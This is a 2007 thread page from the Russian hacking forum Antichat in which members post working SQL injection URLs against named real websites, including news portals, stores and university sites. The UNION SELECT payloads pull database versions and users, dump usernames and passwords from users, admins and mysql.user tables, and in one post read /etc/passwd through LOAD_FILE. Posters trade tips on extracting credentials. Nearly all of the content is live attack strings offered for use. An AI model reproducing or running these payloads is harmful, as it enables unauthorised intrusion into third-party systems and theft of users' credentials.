ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1671  
Старый 06.04.2007, 16:17
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.4iper.net/article.php?doc_id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
 
Ответить с цитированием

  #1672  
Старый 06.04.2007, 16:40
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

Код:
http://peoplehost.com/support/kb2.php?q_id=-1+union+select+1,concat(version(),char(58),user()),3,4,5,6,7/*
Код:
http://quizfarm.com/test.php?q_id=-1+union+select+1,concat(table_name,0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+limit+21,22/*
Код:
http://www.sinemrenault.com/trk/renault/haberler.php?H_ID=-1+union+select+1,convert(version()+using+latin1),3,4,5,6+from+users/*
Код:
http://www.radata.com/store/index.php?hid=-1+union+select+1,concat(convert(username+using+latin1),0x3a,convert(password+using+latin1)),3+from+user+limit+0,1/*
Код:
http://www.mersin.edu.tr/icerik.php?hid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(user,0x3a,password),26+from+mysql.user/*
Код:
http://www.saglikbilgisi.com/haber.php?hid=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user/*
 
Ответить с цитированием

  #1673  
Старый 06.04.2007, 18:08
Аватар для ShadOS
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию

Цитата:
Сообщение от genom--  
...
http://www.bendruomenes.lt/news.php?id='
...
вот щас очень занят а хотел поковырять --давайте сами =)
Наугад выбрал:
Код:
http://www.bendruomenes.lt/news.php?id=-1+UNION+select+1,2,3,4,5,concat(version(),char(58),user()),7,8,9,10/*
А вот здесь на сайте c приветствием "Welcome to my website. My name is Jem and I'm a l33t PHP ninja." версия выводится в строку адреса:
Код:
http://www.jemjabella.co.uk/postbyid.php?id=-1+UNION+SELECT+concat(version(),char(58),user())/*
Я долго ржал.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....

Последний раз редактировалось ShadOS; 06.04.2007 в 18:16..
 
Ответить с цитированием

  #1674  
Старый 06.04.2007, 18:46
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

2ShadOS
ну тогда уж сразу вывел бы данные или это уже не в моде?
Код:
http://www.bendruomenes.lt/news.php?strid=-23412+union+select+concat(username,char(58),password)+from+users/*
 
Ответить с цитированием

  #1675  
Старый 06.04.2007, 18:48
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://www.oebu.ch/de/artikel.php?id=-324+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/*
Код:
http://www.rueleon.net/manifestations.php?Id=-51+union+select+LOAD_FILE(0x2f6574632f706173737764)/*
 
Ответить с цитированием

  #1676  
Старый 06.04.2007, 19:15
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.spbdrive.ru/autoworld.php?news_id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9/*
http://www.spbdrive.ru/autoworld.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*
Код:
http://www.pomoyka.org/index.php?part=f&id=-1+union+select+1,convert(concat(database(),char(58),user(),version()),char),3,4/*
 
Ответить с цитированием

  #1677  
Старый 06.04.2007, 20:02
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

2ShadOS
повидимому ты не прочитал предыдущий мой пост
Код:
http://www.avilys.lt/index.php?id='+UNION+select+concat(name,char(58),pass)+from+admins/*
 
Ответить с цитированием

  #1678  
Старый 06.04.2007, 20:19
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

боян, небоян хз.
Вытащил все, юзеров перебираем лимитом
Код:
http://www.cahiersdufoot.net/article.php?id=-1322+union+select+1,2,3,concat_ws(char(58),version(),user(),database()),user,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #1679  
Старый 06.04.2007, 20:30
Аватар для ShadOS
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию

Цитата:
Сообщение от genom--  
...
http://leidykla.ktu.lt/main.php?ID='
...
а вот здесь blind. У меня опыта маловато чтобы что-то сделать дальше:
Код:
http://leidykla.ktu.lt/main.php?ID=-1)+UNION+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
 
Ответить с цитированием

  #1680  
Старый 06.04.2007, 20:59
Аватар для _GaLs_
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию

версия MySql
Код:
http://www.afghannews.net/index.php?newsgroup=6+union+select+null,VERSION(),null,null,null,null,null,null,null,null,null,null,null/*
логин текущего пользователя базы данных
http://www.afghannews.net/index.php?newsgroup=6+union+select+null,USER(),nul l,null,null,null,null,null,null,null,null,null,nul l/*

имя используемой базы данных
http://www.afghannews.net/index.php?newsgroup=6+union+select+null,DATABASE() ,null,null,null,null,null,null,null,null,null,null ,null/*

И ещё если за мест null поставить попарядку 1,2,3 .... то на страничке дабавится цифра 8 )))))

Последний раз редактировалось _GaLs_; 06.04.2007 в 21:10..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ